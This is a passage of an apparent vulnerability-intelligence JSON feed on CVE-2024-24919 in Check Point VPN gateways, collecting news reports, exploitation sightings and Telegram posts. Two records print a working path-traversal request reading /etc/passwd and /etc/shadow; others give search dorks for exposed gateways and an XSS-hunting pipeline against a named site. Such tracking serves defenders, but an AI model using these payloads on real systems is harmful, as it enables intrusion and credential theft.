\u0434\u043e\u043c\u0435\u043d\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u043f\u043e \u0441\u0435\u0442\u0438 \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c. \u0415\u0441\u043b\u0438 \u043d\u0430 \u0448\u043b\u044e\u0437\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d VPN-\u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442, \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u043e\u0441\u043e\u0431\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u0439.\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u00a0\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u043f\u0440\u0438\u0437\u044b\u0432\u0430\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438\u0445 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0437\u0430\u0449\u0438\u0442\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0441\u0431\u0440\u043e\u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u041e\u0421 Gaia \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e \u043f\u0430\u0440\u043e\u043b\u044e.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e 0-day \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0443\u0436\u0435 \u043d\u0435 \u0432 \u043f\u0435\u0440\u0432\u044b\u0439 \u0440\u0430\u0437, \u043f\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u044e \u043d\u0430 31 \u043c\u0430\u044f\u00a0Censys \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u0431\u043e\u043b\u0435\u0435 13 800 \u0448\u043b\u044e\u0437\u043e\u0432 Check Point, \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442. \u041d\u0435 \u0432\u0441\u0435, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f CVE-2024-24919.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0441\u0442\u0430\u0440\u0442\u043e\u0432\u0430\u043b\u0430 \u0440\u0430\u043d\u044c\u0448\u0435 \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u043e\u0433\u043e Check Point \u0441\u0440\u043e\u043a\u0430, \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u043d\u0430 \u0434\u0432\u0430 \u043c\u0435\u0441\u044f\u0446\u0430 \u043d\u0430\u0437\u0430\u0434, \u0430 \u0442\u0440\u0435\u0432\u043e\u0433\u0443 \u0437\u0430\u0431\u0438\u043b\u0438 \u043f\u043e\u0434 \u043a\u043e\u043d\u0435\u0446 \u043c\u0430\u044f, \u0442\u043e \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u0432\u0441\u0435 \u0436\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0448\u0438\u0440\u043e\u043a.\n\n\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0435\u0441\u044f \u0430\u0442\u0430\u043a\u0438, \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438 \u0442\u043e\u0442 \u0444\u0430\u043a\u0442, \u0447\u0442\u043e \u0440\u044f\u0434 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0448\u043b\u044e\u0437\u043e\u0432 Check Point \u0443\u044f\u0437\u0432\u0438\u043c\u044b, \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u044e \u0440\u0438\u0441\u043a\u0430.", "creation_timestamp": "2024-06-03T19:25:05.000000Z"}, {"uuid": "86937af9-43ec-43c6-9a60-714ce093864b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1492", "content": "CVE-2024-24919:  Check Point arbitrary file read (as root) \n\n Blog: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n\n#cve #pentest #redteam", "creation_timestamp": "2024-05-31T09:48:25.000000Z"}, {"uuid": "0e277395-5de4-4532-884a-a0fbfdf26872", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/ctinow/218435", "content": "Check Point Security Gateway Information Disclosure Vulnerability (CVE-2024-24919)\nhttps://ift.tt/t01d6ze", "creation_timestamp": "2024-06-08T01:14:40.000000Z"}, {"uuid": "d777e5f7-66d1-456f-84a8-2f1ae06235e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3296", "content": "CVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nHost: \nAccept-Encoding: gzip\n\naCSHELL/../../../../../../../etc/passwd\n\n\nfofa :  body=\"check point ssl network\" &amp;&amp; country=\"IL\"\n\n#exploit #poc", "creation_timestamp": "2024-10-09T17:29:34.000000Z"}, {"uuid": "e158e969-fa91-4ef1-8f05-86ffdef7e710", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/530", "content": "https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nCVE-2024-24919 Bulk Scanner\n#github #poc", "creation_timestamp": "2024-06-03T05:55:44.000000Z"}, {"uuid": "5bb27e09-2033-48ff-a7ec-48e8017c8e11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/information_security_channel/52282", "content": "Check Point VPN Attacks Involve Zero-Day Exploited Since April\nhttps://www.securityweek.com/check-point-vpn-attacks-involve-zero-day-exploited-since-april/\n\nThe recently disclosed Check Point VPN attacks involve the zero-day vulnerability CVE-2024-24919, which allows hackers to obtain passwords.\nThe post Check Point VPN Attacks Involve Zero-Day Exploited Since April (https://www.securityweek.com/check-point-vpn-attacks-involve-zero-day-exploited-since-april/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-05-30T14:04:56.000000Z"}, {"uuid": "9320e7f6-a941-4a2d-b566-d3dad5ef4c4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/thehackernews/5030", "content": "\ud83d\udea8 Attention: Check Point discovers zero-day vulnerability CVE-2024-24919 in Network Security VPN gateway products, exploited in the wild. \n \nRead more here: https://thehackernews.com/2024/05/check-point-warns-of-zero-day-attacks.html \n \n\ud83d\udd27 Ensure your systems are patched with the latest hotfixes.", "creation_timestamp": "2024-05-29T17:21:02.000000Z"}, {"uuid": "5cc874a8-9642-47ad-aad3-3837d80e5cbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/thehackernews/5043", "content": "\ud83d\udea8 Active Exploitation Alert! \n \nCISA has added two high-severity vulnerabilities to the KEV catalog due to active exploitation: \n \nCVE-2024-1086 (Linux kernel) \nCVE-2024-24919 (Check Point) \n \nRead: https://thehackernews.com/2024/05/cisa-alerts-federal-agencies-to-patch.html", "creation_timestamp": "2024-05-30T19:46:52.000000Z"}, {"uuid": "a17c4b18-9fa1-45bd-a8dd-ba985f602546", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8811", "content": "GitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC", "creation_timestamp": "2024-06-12T13:16:09.000000Z"}, {"uuid": "123b88b0-7163-4624-a62a-38705f9bb9a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostofPs_org/56251", "content": "Tools - Hackers Factory\n\nGourlex \n\nIt is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.\n\nTry the tool :\u00a0 https://github.com/trap-bytes/gourlex\n\nFind xss with this automation of the following work :\n\n1. subfinder -d indeed.com -o indeed.txt //Find Subdomains\n2. httpx -l subdomains.txt -o httpx.txt // Live Subdomains\n3. echo \"indeed.com\" | gau --threads 5 &gt;&gt; Enpoints.txt // Find Endpoints\n4. cat httpx.txt | katana -jc &gt;&gt; Enpoints.txt // Find More Endpoints\n5. cat Enpoints.txt | uro &gt;&gt; Endpoints_F.txt // Remove Duplicates\n6. cat Endpoints_F.txt | gf xss &gt;&gt; XSS.txt // Filter Endpoints for XSS\n7. cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters\n8. dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS\n\nScript : https://github.com/dirtycoder0124/xss\n\nA simple powershell script that can run in powershell for linux. The purpose of the script is to identify potential privilege escalation vulnerabilities on Linux systems that run with PowerShell\n\nhttps://github.com/tjnull/pentest-arsenal/tree/main/Cadiclus\n\nInQL makes mapping out a GraphQL API easy! It also includes several automated vulnerability checks!\u00a0 \n\ngithub.com/doyensec/inql\n\nA Microservices-based framework for the study of Network Security and Penetration Test techniques \n\nhttps://github.com/DockerSecurityPlayground/DSP\n\nSnaffler reimplementation in Python -\n\nhttps://github.com/SnaffCon/Snaffler\nhttps://github.com/asmtlab/snafflepy\n\nCVE-2024-24919 \n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nCVE-2024-24919 [Check Point Security Gateway Information Disclosure] \n\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nExtract endpoints from APK files \n\nhttps://github.com/ndelphit/apkurlgrep\n\n#HackersFactory", "creation_timestamp": "2024-06-03T09:26:55.000000Z"}, {"uuid": "b711b2ae-230b-4689-a9b5-ff82c859b29b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2563", "content": "https://github.com/c3rrberu5/CVE-2024-24919\n\nNuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.\n\n#github #exploit", "creation_timestamp": "2024-05-30T14:50:47.000000Z"}, {"uuid": "ca6fbea5-8571-497a-bce8-2082e9a055f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2656", "content": "CVE-2024-24919\n\nPOST /clients/MyCRL HTTP/1.1\nHost:\nContent-Type: application/x-www-form-urlencoded\n\naCSHELL/../../../../../../../etc/shadow\n\n#poc #exploit", "creation_timestamp": "2024-06-12T18:55:13.000000Z"}, {"uuid": "74c2f134-db8c-41cc-9d3c-2f190907bc9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "https://t.me/xakep_ru/15893", "content": "\u0425\u0430\u043a\u0435\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0442 Check Point VPN \u0434\u043b\u044f \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0441\u0435\u0442\u0438\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0442 Check Point Remote Access VPN \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0437\u043b\u043e\u043c\u0443 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nhttps://xakep.ru/2024/05/30/cve-2024-24919/", "creation_timestamp": "2024-05-30T12:35:05.000000Z"}, {"uuid": "01533ea5-dcb8-4cca-b39c-fb20cd2ede32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25025", "content": "Tools - Hackers Factory\n\nGraphw00f is GraphQL Server Engine Fingerprinting utility for software security professionals looking to learn more about what technology is behind a given GraphQL endpoint. \n\nhttps://github.com/dolevf/graphw00f\n\nSecurity Auditor Utility for GraphQL APIs \n\nhttps://github.com/dolevf/graphql-cop\n\nA toolkit for testing, tweaking and cracking JSON Web Tokens \n\nhttps://github.com/ticarpi/jwt_tool\n\nSearch Google/Bing/Ecosia/DuckDuckGo/Yandex/Yahoo for a search term (dork) with a default set of websites, bug bounty programs or custom collection. \n\nhttps://github.com/Zarcolio/sitedorks\n\nAn interactive shell to spoof some LOLBins command line \n\nhttps://github.com/itaymigdal/LOLSpoof\n\nCommunity curated list of nuclei templates for finding \"unknown\" security vulnerabilities. \n\nhttps://github.com/projectdiscovery/fuzzing-templates\n\nThis checklist may help you to have a good methodology for bug bounty hunting\n\nhttps://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md\n\nJS Fuzzing - LazyEgg\n\nhttps://github.com/schooldropout1337/lazyegg/?s=08\n\nCheck point: CVE-2024-24919 \nDork: \"Server: Check Point SVN\" \"X-UA-Compatible: IE=EmulateIE7\"\n\nhttps://github.com/johnk3r/nuclei-templates/blob/main/http/cves/2024/CVE-2024-24919.yaml\n\nBurp Extension to find potential endpoints, parameters, and generate a custom target wordlist \n\nhttps://github.com/xnl-h4ck3r/GAP-Burp-Extension\n\nLive Feed of C2 servers, tools, and botnets \n\nhttps://github.com/montysecurity/C2-Tracker\n\n#HackersFactory", "creation_timestamp": "2024-06-02T06:50:21.000000Z"}, {"uuid": "46e67218-4556-4479-b952-53c42b7a5f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/25070", "content": "Tools - Hackers Factory\n\nVATINT (Vehicle and Transportation Intelligence) Tools \n\nOnline services for search by VIN or License Plates numbers in different countries;\nStolen car database (Europe);\nContainer and ships tracking;\nFlights, trains, drones tracking\n\nand much more.\n\nhttps://github.com/CScorza/Tool-VATINT\n\nLAZYEGG\n\nTool for extracting different data from web pages:\n\n- cookies\n- leaked credentials\n- domains\n- ips\n- images\n- links\n\nand more.\n\nhttps://github.com/schooldropout1337/nuclei-templates/blob/main/lazyegg.py\n\nSUBPROBER\n\nA simple tool for scanning a list of websites. Allows you to collect a lot of data - IP address, status code,\u00a0 title, response length, content type, redirect info etc.\n\nhttps://github.com/RevoltSecurities/SubProber\n\nAdvanced Search Tools\n\n- regional search engines\n- privacy search engines\n- search engines dorking\n- fact checking tools\n- database search tools\n\nand more.\n\nhttps://start.me/p/nRADzL/advanced-search-tools\n\nGitHub - seed1337/CVE-2024-24919-POC\n\nhttps://github.com/seed1337/CVE-2024-24919-POC\n\n10 years of the GitHub Security Bug Bounty Program\n\nhttps://github.blog/2024-06-11-10-years-of-the-github-security-bug-bounty-program/\n\nThis page lists all the available scanning profiles shipped with Rainmap Lite.\n\nhttps://github.com/cldrn/rainmap-lite/wiki/Scanning-profiles\n\nSecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.\n\nhttps://github.com/danielmiessler/SecLists\n\nOnion addresses for anything. \n\nhttps://github.com/cmars/onionpipe\n\nOneDorkForAll/dorks/1M_dork at main \u00b7 HackShiv/OneDorkForAll \u00b7 GitHub\n\nhttps://github.com/HackShiv/OneDorkForAll/tree/main/dorks/1M_dork\n\nPoC for using MS Windows printers for persistence / command and control via Internet Printing\nLicense\n\nhttps://github.com/Diverto/IPPrintC2\n\n#HackersFactory", "creation_timestamp": "2024-06-17T09:54:00.000000Z"}, {"uuid": "60313034-6797-4c31-a4ca-4dc1c038c1d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/BHMW_T04_2JNXmgstKv38JEcZZORtDtFSQbInpBMTvxxoWXK", "content": "", "creation_timestamp": "2024-09-29T17:24:58.000000Z"}, {"uuid": "a6eae47e-6736-4075-b6d2-770ebfd4cb72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2573", "content": "https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n\nCVE-2024-24919 Bulk Scanner\n#github #poc", "creation_timestamp": "2024-06-08T15:51:50.000000Z"}, {"uuid": "2fa3563d-faf2-4f7f-a2c2-46ad39dc8376", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/wEEgbuRqI4vR-IaB8HvL1fc46XrUI9SvfM8iLd0Yng-arF__", "content": "", "creation_timestamp": "2024-10-09T14:32:59.000000Z"}, {"uuid": "c28a9f41-11ad-45c7-83f3-1cf880b45f32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-03)", "content": "", "creation_timestamp": "2026-05-03T00:00:00.000000Z"}, {"uuid": "42c7591f-8a40-414d-9922-4a3da0462096", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/redscriptfreelog/7053", "content": "CVE-2024-24919:  Check Point arbitrary file read (as root) \n\n Blog: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n\n#cve #pentest #redteam", "creation_timestamp": "2024-06-07T09:25:31.000000Z"}, {"uuid": "7cf9c208-a8f9-419c-af69-e1a93981fd56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/redscriptfreelog/7056", "content": "CVE-2024-24919:  Check Point arbitrary file read (as root) \n\n Blog: https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/\n\n#cve #pentest #redteam", "creation_timestamp": "2024-06-07T09:25:31.000000Z"}, {"uuid": "5c8aa135-0d3f-4e1c-8c30-7665069972f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "Telegram/6H7Xx5Og4dom0n_nxbCvk9JXxecOJ3CLU-TZxm3_8PQsc2-w", "content": "", "creation_timestamp": "2024-06-12T11:46:17.000000Z"}, {"uuid": "cfc2a075-3feb-456b-a37f-b5b760571c5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/KJndoLj28AyT4-4QuGgbBbGpMLxaZY0Y-RbKxZWIMT8TbxY", "content": "", "creation_timestamp": "2025-02-20T13:27:16.000000Z"}, {"uuid": "f54df8c4-432d-4a76-b314-e0db574c96ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/3Xf1NAHUJgJwHbjGLZy-GR2kkxooSOz2mT7L58HxUaZjcHY", "content": "", "creation_timestamp": "2024-05-31T00:53:28.000000Z"}, {"uuid": "f5d3c4d1-d9dd-4e8b-8a02-31499acd68b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10597", "content": "#exploit\n1. CVE-2024-24919:\nCheck Point - Wrong Check Point\nhttps://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919\n\n2. CVE-2024-30043:\nAbusing URL Parsing Confusion to Exploit XXE on SharePoint Server and Cloud\nhttps://www.zerodayinitiative.com/blog/2024/5/29/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud\n\n3. Post-Exploiting an F5 Big-IP\nhttps://offsec.almond.consulting/post-exploiting-f5-BIG-IP.html", "creation_timestamp": "2024-05-31T14:50:20.000000Z"}, {"uuid": "314b7275-3c27-4ad1-ae10-dad91fe92713", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10608", "content": "#tools\n#Blue_Team_Techniques\n1. Linux Incident Response Reporting Tool\nhttps://github.com/emrekybs/MrHandler\n2. CVE-2024-24919 Vulnerability Scanner\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner\n]-&gt; https://github.com/RevoltSecurities/CVE-2024-24919", "creation_timestamp": "2024-06-05T16:52:31.000000Z"}, {"uuid": "aa02ef4a-37bb-4767-9965-01104679ea43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "https://t.me/Rootsec_2/3322", "content": "#tools\n#Blue_Team_Techniques\n1. Linux Incident Response Reporting Tool\nhttps://github.com/emrekybs/MrHandler\n2. CVE-2024-24919 Vulnerability Scanner\nhttps://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner", "creation_timestamp": "2024-08-16T11:10:58.000000Z"}, {"uuid": "c6cf7516-94e6-4029-afc1-dc9da0ea1e7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "Telegram/DzAO_opaOkqO-HQV0F5OqhiJPmBZwFEvBUxOvXVCp1Qpmw", "content": "", "creation_timestamp": "2025-02-20T13:27:10.000000Z"}, {"uuid": "8e18dba6-40ac-425d-853f-79982b838bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-05-04)", "content": "", "creation_timestamp": "2026-05-04T00:00:00.000000Z"}, {"uuid": "25774223-c7ee-4cc1-b3be-616eb0a10827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-05-04)", "content": "", "creation_timestamp": "2026-05-04T00:00:00.000000Z"}, {"uuid": "896f52c2-1355-40da-a8ff-ec91cd6264ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-24919", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-30)", "content": "", "creation_timestamp": "2026-04-30T00:00:00.000000Z"}]}